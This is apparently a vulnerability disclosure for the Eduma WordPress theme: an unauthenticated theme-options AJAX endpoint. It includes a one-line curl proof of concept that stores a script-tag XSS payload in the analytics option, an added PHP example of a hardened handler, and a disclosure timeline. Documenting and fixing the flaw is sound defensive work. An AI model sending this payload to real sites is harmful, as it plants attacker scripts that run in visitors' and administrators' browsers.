Education WP 220.127.116.11 (aka Eduma) suffers from a fairly common issue: an exposed theme-options endpoint.
Avada had essentially the same type of issue, and most WordPress theme- and plugin-related issues boil down to an option or setting that can be changed by someone who should not be able to.
The POC is pretty simple: it updates one of the theme options (the thim_google_analytics key, as seen in the request below) with a script tag.
Of course, when all of the options or settings are exposed there are other things that can be done, like changing a PayPal address, so it is pretty dangerous.
Stored XSS POC
curl -D- 'http://127.0.0.1/wp-admin/admin-ajax.php' --data "action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=XXXX</script><script>alert(1337)</script><scrtipt>"
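The root cause is an admin-ajax handler that writes theme mods without checking who is calling. The following is an added example of how such a handler is hardened (it is not Eduma's own code); the action name and the thim_key/thim_value parameters come from the POC above, while the function name, nonce action and the PayPal key name are assumptions.

```php
<?php
// Added example, not the theme's code: a hardened admin-ajax theme-mods handler.
// Assumption: the vulnerable handler was reachable without a session (the POC
// sends no cookies), i.e. it was also hooked on wp_ajax_nopriv_*. Here it is
// registered for logged-in users only.
add_action( 'wp_ajax_thim_update_theme_mods', 'example_update_theme_mods' );

function example_update_theme_mods() {
    // 1. Authorization: only users allowed to manage theme settings.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. CSRF protection: the settings page must supply a nonce for this action
    //    (nonce action name is assumed). Dies with 403 on mismatch.
    check_ajax_referer( 'example_theme_mods_nonce', 'nonce' );

    // 3. Allow-list of keys that may be written, each with its own sanitizer,
    //    so an arbitrary "thim_key" cannot overwrite any option it likes.
    $allowed = array(
        'thim_google_analytics' => 'sanitize_text_field', // strips the <script> payload
        'thim_paypal_email'     => 'sanitize_email',      // assumed key name
    );

    $key = isset( $_POST['thim_key'] ) ? sanitize_key( $_POST['thim_key'] ) : '';
    if ( ! isset( $allowed[ $key ] ) ) {
        wp_send_json_error( 'unknown option', 400 );
    }

    $raw   = isset( $_POST['thim_value'] ) ? wp_unslash( $_POST['thim_value'] ) : '';
    $value = call_user_func( $allowed[ $key ], $raw );

    // 4. Persist the sanitized value only. Whatever renders it later must still
    //    escape it for its context (esc_attr(), esc_js(), ...).
    set_theme_mod( $key, $value );
    wp_send_json_success( array( 'key' => $key ) );
}
```

With these checks in place the unauthenticated request from the POC is rejected at step 1, and even an authorized admin cannot store raw HTML in the Google Analytics field.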
23-04-2017 - Vulnerability discovered
23-04-2017 - Vendor notified
27-04-2017 - Vendor fixed the issues in 3.0.7
08-05-2017 - Vulnerability goes public